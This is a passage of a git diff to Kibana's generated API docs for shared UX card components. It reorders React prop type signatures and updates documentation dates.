undefined; onDurationChangeCapture?: React.ReactEventHandler | undefined; onEmptied?: React.ReactEventHandler | undefined; onEmptiedCapture?: React.ReactEventHandler | undefined; onEncrypted?: React.ReactEventHandler | undefined; onEncryptedCapture?: React.ReactEventHandler | undefined; onEnded?: React.ReactEventHandler | undefined; onEndedCapture?: React.ReactEventHandler | undefined; onLoadedData?: React.ReactEventHandler | undefined; onLoadedDataCapture?: React.ReactEventHandler | undefined; onLoadedMetadata?: React.ReactEventHandler | undefined; onLoadedMetadataCapture?: React.ReactEventHandler | undefined; onLoadStart?: React.ReactEventHandler | undefined; onLoadStartCapture?: React.ReactEventHandler | undefined; onPause?: React.ReactEventHandler | undefined; onPauseCapture?: React.ReactEventHandler | undefined; onPlay?: React.ReactEventHandler | undefined; onPlayCapture?: React.ReactEventHandler | undefined; onPlaying?: React.ReactEventHandler | undefined; onPlayingCapture?: React.ReactEventHandler | undefined; onProgress?: React.ReactEventHandler | undefined; onProgressCapture?: React.ReactEventHandler | undefined; onRateChange?: React.ReactEventHandler | undefined; onRateChangeCapture?: React.ReactEventHandler | undefined; onSeeked?: React.ReactEventHandler | undefined; onSeekedCapture?: React.ReactEventHandler | undefined; onSeeking?: React.ReactEventHandler | undefined; onSeekingCapture?: React.ReactEventHandler | undefined; onStalled?: React.ReactEventHandler | undefined; onStalledCapture?: React.ReactEventHandler | undefined; onSuspend?: React.ReactEventHandler | undefined; onSuspendCapture?: React.ReactEventHandler | undefined; onTimeUpdate?: React.ReactEventHandler | undefined; onTimeUpdateCapture?: React.ReactEventHandler | undefined; onVolumeChange?: React.ReactEventHandler | undefined; onVolumeChangeCapture?: React.ReactEventHandler | undefined; onWaiting?: React.ReactEventHandler | undefined; onWaitingCapture?: React.ReactEventHandler | undefined; onAuxClick?: React.MouseEventHandler | undefined; onAuxClickCapture?: React.MouseEventHandler | undefined; onClick?: React.MouseEventHandler | undefined; onClickCapture?: React.MouseEventHandler | undefined; onContextMenu?: React.MouseEventHandler | undefined; onContextMenuCapture?: React.MouseEventHandler | undefined; onDoubleClick?: React.MouseEventHandler | undefined; onDoubleClickCapture?: React.MouseEventHandler | undefined; onDrag?: React.DragEventHandler | undefined; onDragCapture?: React.DragEventHandler | undefined; onDragEnd?: React.DragEventHandler | undefined; onDragEndCapture?: React.DragEventHandler | undefined; onDragEnter?: React.DragEventHandler | undefined; onDragEnterCapture?: React.DragEventHandler | undefined; onDragExit?: React.DragEventHandler | undefined; onDragExitCapture?: React.DragEventHandler | undefined; onDragLeave?: React.DragEventHandler | undefined; onDragLeaveCapture?: React.DragEventHandler | undefined; onDragOver?: React.DragEventHandler | undefined; onDragOverCapture?: React.DragEventHandler | undefined; onDragStart?: React.DragEventHandler | undefined; onDragStartCapture?: React.DragEventHandler | undefined; onDrop?: React.DragEventHandler | undefined; onDropCapture?: React.DragEventHandler | undefined; onMouseDown?: React.MouseEventHandler | undefined; onMouseDownCapture?: React.MouseEventHandler | undefined; onMouseEnter?: React.MouseEventHandler | undefined; onMouseLeave?: React.MouseEventHandler | undefined; onMouseMove?: React.MouseEventHandler | undefined; onMouseMoveCapture?: React.MouseEventHandler | undefined; onMouseOut?: React.MouseEventHandler | undefined; onMouseOutCapture?: React.MouseEventHandler | undefined; onMouseOver?: React.MouseEventHandler | undefined; onMouseOverCapture?: React.MouseEventHandler | undefined; onMouseUp?: React.MouseEventHandler | undefined; onMouseUpCapture?: React.MouseEventHandler | undefined; onSelect?: React.ReactEventHandler | undefined; onSelectCapture?: React.ReactEventHandler | undefined; onTouchCancel?: React.TouchEventHandler | undefined; onTouchCancelCapture?: React.TouchEventHandler | undefined; onTouchEnd?: React.TouchEventHandler | undefined; onTouchEndCapture?: React.TouchEventHandler | undefined; onTouchMove?: React.TouchEventHandler | undefined; onTouchMoveCapture?: React.TouchEventHandler | undefined; onTouchStart?: React.TouchEventHandler | undefined; onTouchStartCapture?: React.TouchEventHandler | undefined; onPointerDown?: React.PointerEventHandler | undefined; onPointerDownCapture?: React.PointerEventHandler | undefined; onPointerMove?: React.PointerEventHandler | undefined; onPointerMoveCapture?: React.PointerEventHandler | undefined; onPointerUp?: React.PointerEventHandler | undefined; onPointerUpCapture?: React.PointerEventHandler | undefined; onPointerCancel?: React.PointerEventHandler | undefined; onPointerCancelCapture?: React.PointerEventHandler | undefined; onPointerEnter?: React.PointerEventHandler | undefined; onPointerEnterCapture?: React.PointerEventHandler | undefined; onPointerLeave?: React.PointerEventHandler | undefined; onPointerLeaveCapture?: React.PointerEventHandler | undefined; onPointerOver?: React.PointerEventHandler | undefined; onPointerOverCapture?: React.PointerEventHandler | undefined; onPointerOut?: React.PointerEventHandler | undefined; onPointerOutCapture?: React.PointerEventHandler | undefined; onGotPointerCapture?: React.PointerEventHandler | undefined; onGotPointerCaptureCapture?: React.PointerEventHandler | undefined; onLostPointerCapture?: React.PointerEventHandler | undefined; onLostPointerCaptureCapture?: React.PointerEventHandler | undefined; onScroll?: React.UIEventHandler | undefined; onScrollCapture?: React.UIEventHandler | undefined; onWheel?: React.WheelEventHandler | undefined; onWheelCapture?: React.WheelEventHandler | undefined; onAnimationStart?: React.AnimationEventHandler | undefined; onAnimationStartCapture?: React.AnimationEventHandler | undefined; onAnimationEnd?: React.AnimationEventHandler | undefined; onAnimationEndCapture?: React.AnimationEventHandler | undefined; onAnimationIteration?: React.AnimationEventHandler | undefined; onAnimationIterationCapture?: React.AnimationEventHandler | undefined; onTransitionEnd?: React.TransitionEventHandler | undefined; onTransitionEndCapture?: React.TransitionEventHandler | undefined; 'data-test-subj'?: string | undefined; title?: boolean | React.ReactChild | React.ReactFragment | React.ReactPortal | undefined; button?: React.ReactNode; hidden?: boolean | undefined; icon?: React.ReactElement<", + "{ children?: React.ReactNode; onError?: React.ReactEventHandler | undefined; hidden?: boolean | undefined; icon?: React.ReactElement<", "EuiIconProps", - ", string | React.JSXElementConstructor> | null | undefined; image?: string | React.ReactElement> | undefined; description?: React.ReactNode; security?: string | undefined; defaultValue?: string | number | readonly string[] | undefined; category?: string | undefined; defaultChecked?: boolean | undefined; suppressContentEditableWarning?: boolean | undefined; suppressHydrationWarning?: boolean | undefined; accessKey?: string | undefined; contentEditable?: \"inherit\" | Booleanish | undefined; contextMenu?: string | undefined; dir?: string | undefined; draggable?: Booleanish | undefined; placeholder?: string | undefined; slot?: string | undefined; spellCheck?: Booleanish | undefined; translate?: \"no\" | \"yes\" | undefined; radioGroup?: string | undefined; about?: string | undefined; datatype?: string | undefined; inlist?: any; prefix?: string | undefined; property?: string | undefined; resource?: string | undefined; typeof?: string | undefined; vocab?: string | undefined; autoCapitalize?: string | undefined; autoCorrect?: string | undefined; autoSave?: string | undefined; itemProp?: string | undefined; itemScope?: boolean | undefined; itemType?: string | undefined; itemID?: string | undefined; itemRef?: string | undefined; results?: number | undefined; unselectable?: \"off\" | \"on\" | undefined; inputMode?: \"none\" | \"text\" | \"search\" | \"email\" | \"tel\" | \"url\" | \"numeric\" | \"decimal\" | undefined; is?: string | undefined; rel?: string | undefined; paddingSize?: \"none\" | \"s\" | \"m\" | \"l\" | \"xl\" | \"xs\" | undefined; footer?: React.ReactNode; hasBorder?: boolean | undefined; textAlign?: CardAlignment | undefined; titleElement?: \"h2\" | \"h3\" | \"h4\" | \"h5\" | \"h6\" | \"span\" | undefined; titleSize?: \"s\" | \"xs\" | undefined; betaBadgeProps?: Partial<(", + ", string | React.JSXElementConstructor> | null | undefined; image?: string | React.ReactElement> | undefined; className?: string | undefined; title?: boolean | React.ReactChild | React.ReactFragment | React.ReactPortal | undefined; onChange?: React.FormEventHandler | undefined; onKeyDown?: React.KeyboardEventHandler | undefined; onClick?: React.MouseEventHandler | undefined; id?: string | undefined; description?: React.ReactNode; security?: string | undefined; defaultValue?: string | number | readonly string[] | undefined; lang?: string | undefined; category?: string | undefined; defaultChecked?: boolean | undefined; suppressContentEditableWarning?: boolean | undefined; suppressHydrationWarning?: boolean | undefined; accessKey?: string | undefined; contentEditable?: \"inherit\" | Booleanish | undefined; contextMenu?: string | undefined; dir?: string | undefined; draggable?: Booleanish | undefined; placeholder?: string | undefined; slot?: string | undefined; spellCheck?: Booleanish | undefined; style?: React.CSSProperties | undefined; tabIndex?: number | undefined; translate?: \"no\" | \"yes\" | undefined; radioGroup?: string | undefined; role?: React.AriaRole | undefined; about?: string | undefined; datatype?: string | undefined; inlist?: any; prefix?: string | undefined; property?: string | undefined; resource?: string | undefined; typeof?: string | undefined; vocab?: string | undefined; autoCapitalize?: string | undefined; autoCorrect?: string | undefined; autoSave?: string | undefined; itemProp?: string | undefined; itemScope?: boolean | undefined; itemType?: string | undefined; itemID?: string | undefined; itemRef?: string | undefined; results?: number | undefined; unselectable?: \"on\" | \"off\" | undefined; inputMode?: \"none\" | \"email\" | \"search\" | \"text\" | \"tel\" | \"url\" | \"numeric\" | \"decimal\" | undefined; is?: string | undefined; 'aria-activedescendant'?: string | undefined; 'aria-atomic'?: boolean | \"false\" | \"true\" | undefined; 'aria-autocomplete'?: \"none\" | \"list\" | \"inline\" | \"both\" | undefined; 'aria-busy'?: boolean | \"false\" | \"true\" | undefined; 'aria-checked'?: boolean | \"mixed\" | \"false\" | \"true\" | undefined; 'aria-colcount'?: number | undefined; 'aria-colindex'?: number | undefined; 'aria-colspan'?: number | undefined; 'aria-controls'?: string | undefined; 'aria-current'?: boolean | \"date\" | \"location\" | \"time\" | \"page\" | \"false\" | \"true\" | \"step\" | undefined; 'aria-describedby'?: string | undefined; 'aria-details'?: string | undefined; 'aria-disabled'?: boolean | \"false\" | \"true\" | undefined; 'aria-dropeffect'?: \"none\" | \"copy\" | \"link\" | \"execute\" | \"move\" | \"popup\" | undefined; 'aria-errormessage'?: string | undefined; 'aria-expanded'?: boolean | \"false\" | \"true\" | undefined; 'aria-flowto'?: string | undefined; 'aria-grabbed'?: boolean | \"false\" | \"true\" | undefined; 'aria-haspopup'?: boolean | \"grid\" | \"menu\" | \"false\" | \"true\" | \"dialog\" | \"listbox\" | \"tree\" | undefined; 'aria-hidden'?: boolean | \"false\" | \"true\" | undefined; 'aria-invalid'?: boolean | \"false\" | \"true\" | \"grammar\" | \"spelling\" | undefined; 'aria-keyshortcuts'?: string | undefined; 'aria-label'?: string | undefined; 'aria-labelledby'?: string | undefined; 'aria-level'?: number | undefined; 'aria-live'?: \"off\" | \"assertive\" | \"polite\" | undefined; 'aria-modal'?: boolean | \"false\" | \"true\" | undefined; 'aria-multiline'?: boolean | \"false\" | \"true\" | undefined; 'aria-multiselectable'?: boolean | \"false\" | \"true\" | undefined; 'aria-orientation'?: \"horizontal\" | \"vertical\" | undefined; 'aria-owns'?: string | undefined; 'aria-placeholder'?: string | undefined; 'aria-posinset'?: number | undefined; 'aria-pressed'?: boolean | \"mixed\" | \"false\" | \"true\" | undefined; 'aria-readonly'?: boolean | \"false\" | \"true\" | undefined; 'aria-relevant'?: \"all\" | \"text\" | \"additions\" | \"additions removals\" | \"additions text\" | \"removals\" | \"removals additions\" | \"removals text\" | \"text additions\" | \"text removals\" | undefined; 'aria-required'?: boolean | \"false\" | \"true\" | undefined; 'aria-roledescription'?: string | undefined; 'aria-rowcount'?: number | undefined; 'aria-rowindex'?: number | undefined; 'aria-rowspan'?: number | undefined; 'aria-selected'?: boolean | \"false\" | \"true\" | undefined; 'aria-setsize'?: number | undefined; 'aria-sort'?: \"none\" | \"other\" | \"ascending\" | \"descending\" | undefined; 'aria-valuemax'?: number | undefined; 'aria-valuemin'?: number | undefined; 'aria-valuenow'?: number | undefined; 'aria-valuetext'?: string | undefined; dangerouslySetInnerHTML?: { __html: string; } | undefined; onCopy?: React.ClipboardEventHandler | undefined; onCopyCapture?: React.ClipboardEventHandler | undefined; onCut?: React.ClipboardEventHandler | undefined; onCutCapture?: React.ClipboardEventHandler | undefined; onPaste?: React.ClipboardEventHandler | undefined; onPasteCapture?: React.ClipboardEventHandler | undefined; onCompositionEnd?: React.CompositionEventHandler | undefined; onCompositionEndCapture?: React.CompositionEventHandler | undefined; onCompositionStart?: React.CompositionEventHandler | undefined; onCompositionStartCapture?: React.CompositionEventHandler | undefined; onCompositionUpdate?: React.CompositionEventHandler | undefined; onCompositionUpdateCapture?: React.CompositionEventHandler | undefined; onFocus?: React.FocusEventHandler | undefined; onFocusCapture?: React.FocusEventHandler | undefined; onBlur?: React.FocusEventHandler | undefined; onBlurCapture?: React.FocusEventHandler | undefined; onChangeCapture?: React.FormEventHandler | undefined; onBeforeInput?: React.FormEventHandler | undefined; onBeforeInputCapture?: React.FormEventHandler | undefined; onInput?: React.FormEventHandler | undefined; onInputCapture?: React.FormEventHandler | undefined; onReset?: React.FormEventHandler | undefined; onResetCapture?: React.FormEventHandler | undefined; onSubmit?: React.FormEventHandler | undefined; onSubmitCapture?: React.FormEventHandler | undefined; onInvalid?: React.FormEventHandler | undefined; onInvalidCapture?: React.FormEventHandler | undefined; onLoad?: React.ReactEventHandler | undefined; onLoadCapture?: React.ReactEventHandler | undefined; onErrorCapture?: React.ReactEventHandler | undefined; onKeyDownCapture?: React.KeyboardEventHandler | undefined; onKeyPress?: React.KeyboardEventHandler | undefined; onKeyPressCapture?: React.KeyboardEventHandler | undefined; onKeyUp?: React.KeyboardEventHandler | undefined; onKeyUpCapture?: React.KeyboardEventHandler | undefined; onAbort?: React.ReactEventHandler | undefined; onAbortCapture?: React.ReactEventHandler | undefined; onCanPlay?: React.ReactEventHandler | undefined; onCanPlayCapture?: React.ReactEventHandler | undefined; onCanPlayThrough?: React.ReactEventHandler | undefined; onCanPlayThroughCapture?: React.ReactEventHandler | undefined; onDurationChange?: React.ReactEventHandler | undefined; onDurationChangeCapture?: React.ReactEventHandler | undefined; onEmptied?: React.ReactEventHandler | undefined; onEmptiedCapture?: React.ReactEventHandler | undefined; onEncrypted?: React.ReactEventHandler | undefined; onEncryptedCapture?: React.ReactEventHandler | undefined; onEnded?: React.ReactEventHandler | undefined; onEndedCapture?: React.ReactEventHandler | undefined; onLoadedData?: React.ReactEventHandler | undefined; onLoadedDataCapture?: React.ReactEventHandler | undefined; onLoadedMetadata?: React.ReactEventHandler | undefined; onLoadedMetadataCapture?: React.ReactEventHandler | undefined; onLoadStart?: React.ReactEventHandler | undefined; onLoadStartCapture?: React.ReactEventHandler | undefined; onPause?: React.ReactEventHandler | undefined; onPauseCapture?: React.ReactEventHandler | undefined; onPlay?: React.ReactEventHandler | undefined; onPlayCapture?: React.ReactEventHandler | undefined; onPlaying?: React.ReactEventHandler | undefined; onPlayingCapture?: React.ReactEventHandler | undefined; onProgress?: React.ReactEventHandler | undefined; onProgressCapture?: React.ReactEventHandler | undefined; onRateChange?: React.ReactEventHandler | undefined; onRateChangeCapture?: React.ReactEventHandler | undefined; onSeeked?: React.ReactEventHandler | undefined; onSeekedCapture?: React.ReactEventHandler | undefined; onSeeking?: React.ReactEventHandler | undefined; onSeekingCapture?: React.ReactEventHandler | undefined; onStalled?: React.ReactEventHandler | undefined; onStalledCapture?: React.ReactEventHandler | undefined; onSuspend?: React.ReactEventHandler | undefined; onSuspendCapture?: React.ReactEventHandler | undefined; onTimeUpdate?: React.ReactEventHandler | undefined; onTimeUpdateCapture?: React.ReactEventHandler | undefined; onVolumeChange?: React.ReactEventHandler | undefined; onVolumeChangeCapture?: React.ReactEventHandler | undefined; onWaiting?: React.ReactEventHandler | undefined; onWaitingCapture?: React.ReactEventHandler | undefined; onAuxClick?: React.MouseEventHandler | undefined; onAuxClickCapture?: React.MouseEventHandler | undefined; onClickCapture?: React.MouseEventHandler | undefined; onContextMenu?: React.MouseEventHandler | undefined; onContextMenuCapture?: React.MouseEventHandler | undefined; onDoubleClick?: React.MouseEventHandler | undefined; onDoubleClickCapture?: React.MouseEventHandler | undefined; onDrag?: React.DragEventHandler | undefined; onDragCapture?: React.DragEventHandler | undefined; onDragEnd?: React.DragEventHandler | undefined; onDragEndCapture?: React.DragEventHandler | undefined; onDragEnter?: React.DragEventHandler | undefined; onDragEnterCapture?: React.DragEventHandler | undefined; onDragExit?: React.DragEventHandler | undefined; onDragExitCapture?: React.DragEventHandler | undefined; onDragLeave?: React.DragEventHandler | undefined; onDragLeaveCapture?: React.DragEventHandler | undefined; onDragOver?: React.DragEventHandler | undefined; onDragOverCapture?: React.DragEventHandler | undefined; onDragStart?: React.DragEventHandler | undefined; onDragStartCapture?: React.DragEventHandler | undefined; onDrop?: React.DragEventHandler | undefined; onDropCapture?: React.DragEventHandler | undefined; onMouseDown?: React.MouseEventHandler | undefined; onMouseDownCapture?: React.MouseEventHandler | undefined; onMouseEnter?: React.MouseEventHandler | undefined; onMouseLeave?: React.MouseEventHandler | undefined; onMouseMove?: React.MouseEventHandler | undefined; onMouseMoveCapture?: React.MouseEventHandler | undefined; onMouseOut?: React.MouseEventHandler | undefined; onMouseOutCapture?: React.MouseEventHandler | undefined; onMouseOver?: React.MouseEventHandler | undefined; onMouseOverCapture?: React.MouseEventHandler | undefined; onMouseUp?: React.MouseEventHandler | undefined; onMouseUpCapture?: React.MouseEventHandler | undefined; onSelect?: React.ReactEventHandler | undefined; onSelectCapture?: React.ReactEventHandler | undefined; onTouchCancel?: React.TouchEventHandler | undefined; onTouchCancelCapture?: React.TouchEventHandler | undefined; onTouchEnd?: React.TouchEventHandler | undefined; onTouchEndCapture?: React.TouchEventHandler | undefined; onTouchMove?: React.TouchEventHandler | undefined; onTouchMoveCapture?: React.TouchEventHandler | undefined; onTouchStart?: React.TouchEventHandler | undefined; onTouchStartCapture?: React.TouchEventHandler | undefined; onPointerDown?: React.PointerEventHandler | undefined; onPointerDownCapture?: React.PointerEventHandler | undefined; onPointerMove?: React.PointerEventHandler | undefined; onPointerMoveCapture?: React.PointerEventHandler | undefined; onPointerUp?: React.PointerEventHandler | undefined; onPointerUpCapture?: React.PointerEventHandler | undefined; onPointerCancel?: React.PointerEventHandler | undefined; onPointerCancelCapture?: React.PointerEventHandler | undefined; onPointerEnter?: React.PointerEventHandler | undefined; onPointerEnterCapture?: React.PointerEventHandler | undefined; onPointerLeave?: React.PointerEventHandler | undefined; onPointerLeaveCapture?: React.PointerEventHandler | undefined; onPointerOver?: React.PointerEventHandler | undefined; onPointerOverCapture?: React.PointerEventHandler | undefined; onPointerOut?: React.PointerEventHandler | undefined; onPointerOutCapture?: React.PointerEventHandler | undefined; onGotPointerCapture?: React.PointerEventHandler | undefined; onGotPointerCaptureCapture?: React.PointerEventHandler | undefined; onLostPointerCapture?: React.PointerEventHandler | undefined; onLostPointerCaptureCapture?: React.PointerEventHandler | undefined; onScroll?: React.UIEventHandler | undefined; onScrollCapture?: React.UIEventHandler | undefined; onWheel?: React.WheelEventHandler | undefined; onWheelCapture?: React.WheelEventHandler | undefined; onAnimationStart?: React.AnimationEventHandler | undefined; onAnimationStartCapture?: React.AnimationEventHandler | undefined; onAnimationEnd?: React.AnimationEventHandler | undefined; onAnimationEndCapture?: React.AnimationEventHandler | undefined; onAnimationIteration?: React.AnimationEventHandler | undefined; onAnimationIterationCapture?: React.AnimationEventHandler | undefined; onTransitionEnd?: React.TransitionEventHandler | undefined; onTransitionEndCapture?: React.TransitionEventHandler | undefined; 'data-test-subj'?: string | undefined; href?: string | undefined; rel?: string | undefined; target?: string | undefined; paddingSize?: \"none\" | \"m\" | \"s\" | \"xs\" | \"l\" | \"xl\" | undefined; button?: React.ReactNode; footer?: React.ReactNode; hasBorder?: boolean | undefined; textAlign?: CardAlignment | undefined; titleElement?: \"h2\" | \"h3\" | \"h4\" | \"h5\" | \"h6\" | \"span\" | undefined; titleSize?: \"s\" | \"xs\" | undefined; betaBadgeProps?: Partial<(", "CommonProps", " & ", "DisambiguateSet", "<(", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">), WithSpanProps> & WithSpanProps & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -200,13 +200,13 @@ "DisambiguateSet", "<(", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">), WithSpanProps> & WithSpanProps & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -218,15 +218,15 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\"> & { iconType?: ", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\"> & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -236,15 +236,15 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\"> & { iconType?: ", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\"> & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -256,15 +256,15 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\"> & { iconType?: ", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\"> & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -276,7 +276,7 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", @@ -284,7 +284,7 @@ "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -294,7 +294,7 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", @@ -302,7 +302,7 @@ "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -314,7 +314,7 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", @@ -322,13 +322,13 @@ "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", " & ", "DisambiguateSet", - "<{ tooltipContent: React.ReactNode; title?: string | undefined; }, { title: string; tooltipContent?: React.ReactNode; }> & { title: string; tooltipContent?: React.ReactNode; } & { label: React.ReactNode; })> | undefined; selectable?: ", + "<{ tooltipContent: React.ReactNode; title?: string | undefined; }, { title: string; tooltipContent?: React.ReactNode; }> & { title: string; tooltipContent?: React.ReactNode; } & { label: React.ReactNode; })> | undefined; display?: \"warning\" | \"subdued\" | \"primary\" | \"accent\" | \"success\" | \"danger\" | \"transparent\" | \"plain\" | undefined; selectable?: ", "EuiCardSelectProps", " | undefined; }" ], diff --git a/api_docs/kbn_shared_ux_card_no_data.mdx b/api_docs/kbn_shared_ux_card_no_data.mdx index 3e3ecfcd17e42..c8fc4d7c49bcc 100644 --- a/api_docs/kbn_shared_ux_card_no_data.mdx +++ b/api_docs/kbn_shared_ux_card_no_data.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-card-no-data title: "@kbn/shared-ux-card-no-data" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-card-no-data plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-card-no-data'] --- import kbnSharedUxCardNoDataObj from './kbn_shared_ux_card_no_data.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_card_no_data_mocks.devdocs.json b/api_docs/kbn_shared_ux_card_no_data_mocks.devdocs.json index c3f38d680e208..9e15f43a46545 100644 --- a/api_docs/kbn_shared_ux_card_no_data_mocks.devdocs.json +++ b/api_docs/kbn_shared_ux_card_no_data_mocks.devdocs.json @@ -470,7 +470,7 @@ "\nStorybook parameters provided from the controls addon." ], "signature": [ - "{ title: any; button: any; description: any; category: any; canAccessFleet: any; }" + "{ title: any; description: any; category: any; button: any; canAccessFleet: any; }" ], "path": "packages/shared-ux/card/no_data/mocks/src/storybook.ts", "deprecated": false, diff --git a/api_docs/kbn_shared_ux_card_no_data_mocks.mdx b/api_docs/kbn_shared_ux_card_no_data_mocks.mdx index c1de9ac63a78c..166a358c79f5f 100644 --- a/api_docs/kbn_shared_ux_card_no_data_mocks.mdx +++ b/api_docs/kbn_shared_ux_card_no_data_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-card-no-data-mocks title: "@kbn/shared-ux-card-no-data-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-card-no-data-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 